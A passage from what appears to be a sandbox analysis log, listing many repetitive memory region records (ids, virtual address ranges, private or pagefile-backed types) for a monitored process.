"private_0x0000000002240000" filename = "" Region: id = 5307 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5308 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5309 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5310 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5311 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5312 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5313 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5314 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5315 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5316 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5317 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5318 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5319 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5320 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5321 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5322 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5323 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5324 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5325 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5326 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5327 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5328 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5329 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5330 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5331 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5332 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5333 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5334 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5335 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5336 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5338 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5339 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5340 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5341 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5342 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5343 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5344 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5345 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5346 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5347 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5348 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5349 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5350 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5351 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5352 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5353 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5354 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5355 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5356 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5357 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5358 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5359 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5360 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5361 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5362 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5363 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5364 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5365 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5366 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5367 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5368 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5369 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5370 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5371 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5372 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5373 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5374 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5375 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5376 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5377 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5378 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5379 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5380 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5381 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5382 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5383 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5384 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5385 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5386 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5387 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5388 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5389 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5390 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5391 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5392 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5393 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5394 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5395 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5396 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5397 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5398 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5399 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5400 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5401 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5402 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5403 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5404 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5405 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5406 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5407 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5408 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5409 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5410 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5411 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5412 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5413 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5414 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5415 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5416 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5417 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5418 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5419 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5420 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5421 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5422 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5423 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5424 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5425 start_va = 0x470000 end_va = 0x472fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 5426 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5427 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5428 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5429 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5430 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5431 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5432 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5433 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5434 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5435 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5436 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5437 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5438 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5439 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5440 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5441 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5442 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5443 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5444 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5445 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5446 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5447 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5448 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5449 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5450 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5451 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5452 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5453 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5454 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5455 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5456 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5457 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5458 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5459 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5460 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5461 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5462 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5463 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5464 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5465 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5466 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5467 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5468 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5469 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5470 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5471 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5472 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5473 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5474 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5475 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5476 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5477 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5478 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5479 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5480 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5481 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5482 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5483 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5484 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5485 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5486 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5487 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5488 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5489 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5490 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5491 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5492 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5493 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5494 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5495 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5496 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5497 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5498 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5499 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5500 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5501 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5502 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5503 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5504 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5505 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5506 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 